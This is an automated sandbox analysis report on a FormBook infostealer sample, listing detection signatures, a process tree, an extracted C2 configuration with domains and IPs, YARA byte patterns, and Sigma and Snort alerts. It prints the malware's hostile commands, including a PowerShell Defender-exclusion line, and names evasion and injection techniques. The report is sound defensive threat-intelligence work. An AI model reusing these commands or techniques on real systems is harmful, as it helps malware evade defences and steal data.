Edit tour

Windows Analysis Report
z2______________________________.exe

Overview

General Information

Sample name:	z2______________________________.exe
Analysis ID:	1392182
MD5:	cd8edca1396524d51a71ca38b7f5273f
SHA1:	d8a092cd9c6d4034e1dae4c850169e38ba46ff7b
SHA256:	1d5692148172354fedfed8e9e8f368a59a8c2c6372c7885e80087d9ba5ad76c1
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

z2______________________________.exe (PID: 7496 cmdline: C:\Users\user\Desktop\z2______________________________.exe MD5: CD8EDCA1396524D51A71CA38B7F5273F)

powershell.exe (PID: 7668 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7900 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

RegSvcs.exe (PID: 7676 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7708 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

control.exe (PID: 7956 cmdline: C:\Windows\SysWOW64\control.exe MD5: EBC29AA32C57A54018089CFC9CACAFE8)

cmd.exe (PID: 7992 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x64d1:$a1: 3C 30 50 4F 53 54 74 09 40 0x348f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x61d11:$a1: 3C 30 50 4F 53 54 74 09 40 0x1ce30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b250:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78670:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xac3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3905f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x6647f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15b27:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x43f47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71367:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9df2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37fa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38212:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x653c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15925:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x43d45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71165:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43831:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x70c51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15a27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x43e47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71267:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15b9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x43fbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x713df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa80a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x38c2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6604a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18ab9:$sqlite3step: 68 34 1C 7B E1 0x18bcc:$sqlite3step: 68 34 1C 7B E1 0x46ed9:$sqlite3step: 68 34 1C 7B E1 0x46fec:$sqlite3step: 68 34 1C 7B E1 0x742f9:$sqlite3step: 68 34 1C 7B E1 0x7440c:$sqlite3step: 68 34 1C 7B E1 0x18ae8:$sqlite3text: 68 38 2A 90 C5 0x18c0d:$sqlite3text: 68 38 2A 90 C5 0x46f08:$sqlite3text: 68 38 2A 90 C5 0x4702d:$sqlite3text: 68 38 2A 90 C5 0x74328:$sqlite3text: 68 38 2A 90 C5 0x7444d:$sqlite3text: 68 38 2A 90 C5 0x18afb:$sqlite3blob: 68 53 D8 7F 8C 0x18c23:$sqlite3blob: 68 53 D8 7F 8C 0x46f1b:$sqlite3blob: 68 53 D8 7F 8C 0x47043:$sqlite3blob: 68 53 D8 7F 8C 0x7433b:$sqlite3blob: 68 53 D8 7F 8C 0x74463:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: z2______________________________.exe PID: 7496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: z2______________________________.exe PID: 7496	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3b2:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegSvcs.exe PID: 7708	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6e709:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: control.exe PID: 7956	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5daea:$a1: 3C 30 50 4F 53 54 74 09 40 0xdc3af:$a1: 3C 30 50 4F 53 54 74 09 40 0x187376:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
5.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RegSvcs.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\Desktop\z2______________________________.exe, CommandLine: C:\Users\user\Desktop\z2______________________________.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\z2______________________________.exe, NewProcessName: C:\Users\user\Desktop\z2______________________________.exe, OriginalFileName: C:\Users\user\Desktop\z2______________________________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Users\user\Desktop\z2______________________________.exe, ProcessId: 7496, ProcessName: z2______________________________.exe

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\Desktop\z2______________________________.exe, ParentImage: C:\Users\user\Desktop\z2______________________________.exe, ParentProcessId: 7496, ParentProcessName: z2______________________________.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7676, ProcessName: RegSvcs.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\z2______________________________.exe, ParentImage: C:\Users\user\Desktop\z2______________________________.exe, ParentProcessId: 7496, ParentProcessName: z2______________________________.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, ProcessId: 7668, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\z2______________________________.exe, ParentImage: C:\Users\user\Desktop\z2______________________________.exe, ParentProcessId: 7496, ParentProcessName: z2______________________________.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe, ProcessId: 7668, ProcessName: powershell.exe

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	192.168.2.491.195.240.1949742802031412 02/14/24-15:17:31.757335
SID:	2031412
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 103.224.212.212

Timestamp:	192.168.2.4103.224.212.21249746802031412 02/14/24-15:20:15.792678
SID:	2031412
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

